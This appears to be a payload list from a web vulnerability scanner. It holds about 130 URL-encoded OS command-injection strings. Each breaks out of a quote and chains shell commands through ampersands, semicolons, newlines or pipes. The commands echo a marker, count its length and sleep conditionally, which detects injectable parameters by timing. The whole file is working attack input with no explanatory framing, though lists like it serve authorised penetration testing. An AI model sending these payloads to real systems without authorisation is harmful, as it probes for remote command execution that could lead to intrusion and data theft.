+os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NCCVWU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NCCVWU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NCCVWU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NCCVWU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NCCVWU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NCCVWU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27' +os-command-injection,'%27%0A%20str%3D%24%28echo%20LMRVVK%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27' +os-command-injection,'%27%0A%20str%3D%24%28echo%20LMRVVK%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27' +os-command-injection,'%27%0A%20str%3D%24%28echo%20LMRVVK%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27' +os-command-injection,'%27%0A%20str%3D%24%28echo%20LMRVVK%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27' +os-command-injection,'%27%0A%20str%3D%24%28echo%20LMRVVK%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27' +os-command-injection,'%27%0A%20str%3D%24%28echo%20LMRVVK%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27' +os-command-injection,'%27%0A%20str%3D%24%28echo%20LMRVVK%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27' +os-command-injection,'%27%0A%20str%3D%24%28echo%20LMRVVK%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27' +os-command-injection,'%27%0A%20str%3D%24%28echo%20LMRVVK%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27' +os-command-injection,'%27%3B%20str%3D%24%28echo%20RCYHEM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22' +os-command-injection,'%27%3B%20str%3D%24%28echo%20RCYHEM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22' +os-command-injection,'%27%3B%20str%3D%24%28echo%20RCYHEM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22' +os-command-injection,'%27%3B%20str%3D%24%28echo%20RCYHEM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22' +os-command-injection,'%27%3B%20str%3D%24%28echo%20RCYHEM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22' +os-command-injection,'%27%3B%20str%3D%24%28echo%20RCYHEM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22' +os-command-injection,'%27%3B%20str%3D%24%28echo%20RCYHEM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22' +os-command-injection,'%27%3B%20str%3D%24%28echo%20RCYHEM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22' +os-command-injection,'%27%3B%20str%3D%24%28echo%20RCYHEM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22' +os-command-injection,'%27%7C%20%5B%201%20-ne%20%24%28echo%20YGAAWQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22' +os-command-injection,'%27%7C%20%5B%202%20-ne%20%24%28echo%20YGAAWQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22' +os-command-injection,'%27%7C%20%5B%203%20-ne%20%24%28echo%20YGAAWQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22' +os-command-injection,'%27%7C%20%5B%204%20-ne%20%24%28echo%20YGAAWQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22' +os-command-injection,'%27%7C%20%5B%205%20-ne%20%24%28echo%20YGAAWQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22' +os-command-injection,'%27%7C%20%5B%206%20-ne%20%24%28echo%20YGAAWQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22' +os-command-injection,'%27%7C%20%5B%207%20-ne%20%24%28echo%20YGAAWQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22' +os-command-injection,'%27%7C%20%5B%208%20-ne%20%24%28echo%20YGAAWQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22' +os-command-injection,'%27%7C%20%5B%209%20-ne%20%24%28echo%20YGAAWQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20DPWDWF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20DPWDWF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20DPWDWF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20DPWDWF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20DPWDWF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20DPWDWF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20DPWDWF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20DPWDWF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20DPWDWF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22' +os-command-injection,'%27%0A%20str%3D%24%28echo%20BXLXVP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22' +os-command-injection,'%27%0A%20str%3D%24%28echo%20BXLXVP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22' +os-command-injection,'%27%0A%20str%3D%24%28echo%20BXLXVP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22' +os-command-injection,'%27%0A%20str%3D%24%28echo%20BXLXVP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22' +os-command-injection,'%27%0A%20str%3D%24%28echo%20BXLXVP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22' +os-command-injection,'%27%0A%20str%3D%24%28echo%20BXLXVP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22' +os-command-injection,'%27%0A%20str%3D%24%28echo%20BXLXVP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22' +os-command-injection,'%27%0A%20str%3D%24%28echo%20BXLXVP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22' +os-command-injection,'%27%0A%20str%3D%24%28echo%20BXLXVP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22' +os-command-injection,'%27%3B%20str%3D%24%28echo%20DHYUHH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23' +os-command-injection,'%27%3B%20str%3D%24%28echo%20DHYUHH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23' +os-command-injection,'%27%3B%20str%3D%24%28echo%20DHYUHH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23' +os-command-injection,'%27%3B%20str%3D%24%28echo%20DHYUHH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23' +os-command-injection,'%27%3B%20str%3D%24%28echo%20DHYUHH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23' +os-command-injection,'%27%3B%20str%3D%24%28echo%20DHYUHH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23' +os-command-injection,'%27%3B%20str%3D%24%28echo%20DHYUHH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23' +os-command-injection,'%27%3B%20str%3D%24%28echo%20DHYUHH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23' +os-command-injection,'%27%3B%20str%3D%24%28echo%20DHYUHH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23' +os-command-injection,'%27%7C%20%5B%201%20-ne%20%24%28echo%20RLZFDE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23' +os-command-injection,'%27%7C%20%5B%202%20-ne%20%24%28echo%20RLZFDE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23' +os-command-injection,'%27%7C%20%5B%203%20-ne%20%24%28echo%20RLZFDE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23' +os-command-injection,'%27%7C%20%5B%204%20-ne%20%24%28echo%20RLZFDE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23' +os-command-injection,'%27%7C%20%5B%205%20-ne%20%24%28echo%20RLZFDE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23' +os-command-injection,'%27%7C%20%5B%206%20-ne%20%24%28echo%20RLZFDE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23' +os-command-injection,'%27%7C%20%5B%207%20-ne%20%24%28echo%20RLZFDE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23' +os-command-injection,'%27%7C%20%5B%208%20-ne%20%24%28echo%20RLZFDE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23' +os-command-injection,'%27%7C%20%5B%209%20-ne%20%24%28echo%20RLZFDE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZYJHAC%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZYJHAC%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZYJHAC%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZYJHAC%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZYJHAC%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZYJHAC%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZYJHAC%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZYJHAC%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZYJHAC%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23' +os-command-injection,'%27%0A%20str%3D%24%28echo%20JTHMZI%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23' +os-command-injection,'%27%0A%20str%3D%24%28echo%20JTHMZI%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23' +os-command-injection,'%27%0A%20str%3D%24%28echo%20JTHMZI%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23' +os-command-injection,'%27%0A%20str%3D%24%28echo%20JTHMZI%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23' +os-command-injection,'%27%0A%20str%3D%24%28echo%20JTHMZI%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23' +os-command-injection,'%27%0A%20str%3D%24%28echo%20JTHMZI%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23' +os-command-injection,'%27%0A%20str%3D%24%28echo%20JTHMZI%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23' +os-command-injection,'%27%0A%20str%3D%24%28echo%20JTHMZI%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23' +os-command-injection,'%27%0A%20str%3D%24%28echo%20JTHMZI%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23' +os-command-injection,'%27%3B%20str%3D%24%28echo%20PSUJGU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//' +os-command-injection,'%27%3B%20str%3D%24%28echo%20PSUJGU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//' +os-command-injection,'%27%3B%20str%3D%24%28echo%20PSUJGU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//' +os-command-injection,'%27%3B%20str%3D%24%28echo%20PSUJGU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//' +os-command-injection,'%27%3B%20str%3D%24%28echo%20PSUJGU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//' +os-command-injection,'%27%3B%20str%3D%24%28echo%20PSUJGU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//' +os-command-injection,'%27%3B%20str%3D%24%28echo%20PSUJGU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//' +os-command-injection,'%27%3B%20str%3D%24%28echo%20PSUJGU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//' +os-command-injection,'%27%3B%20str%3D%24%28echo%20PSUJGU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//' +os-command-injection,'%27%7C%20%5B%201%20-ne%20%24%28echo%20TYMEOG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//' +os-command-injection,'%27%7C%20%5B%202%20-ne%20%24%28echo%20TYMEOG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//' +os-command-injection,'%27%7C%20%5B%203%20-ne%20%24%28echo%20TYMEOG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//' +os-command-injection,'%27%7C%20%5B%204%20-ne%20%24%28echo%20TYMEOG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//' +os-command-injection,'%27%7C%20%5B%205%20-ne%20%24%28echo%20TYMEOG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//' +os-command-injection,'%27%7C%20%5B%206%20-ne%20%24%28echo%20TYMEOG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//' +os-command-injection,'%27%7C%20%5B%207%20-ne%20%24%28echo%20TYMEOG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//' +os-command-injection,'%27%7C%20%5B%208%20-ne%20%24%28echo%20TYMEOG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//' +os-command-injection,'%27%7C%20%5B%209%20-ne%20%24%28echo%20TYMEOG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YQNAJZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YQNAJZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YQNAJZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YQNAJZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YQNAJZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YQNAJZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YQNAJZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YQNAJZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YQNAJZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//' +os-command-injection,'%27%0A%20str%3D%24%28echo%20ZSGSGJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//' +os-command-injection,'%27%0A%20str%3D%24%28echo%20ZSGSGJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//' +os-command-injection,'%27%0A%20str%3D%24%28echo%20ZSGSGJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//' +os-command-injection,'%27%0A%20str%3D%24%28echo%20ZSGSGJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//' +os-command-injection,'%27%0A%20str%3D%24%28echo%20ZSGSGJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//' +os-command-injection,'%27%0A%20str%3D%24%28echo%20ZSGSGJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//' 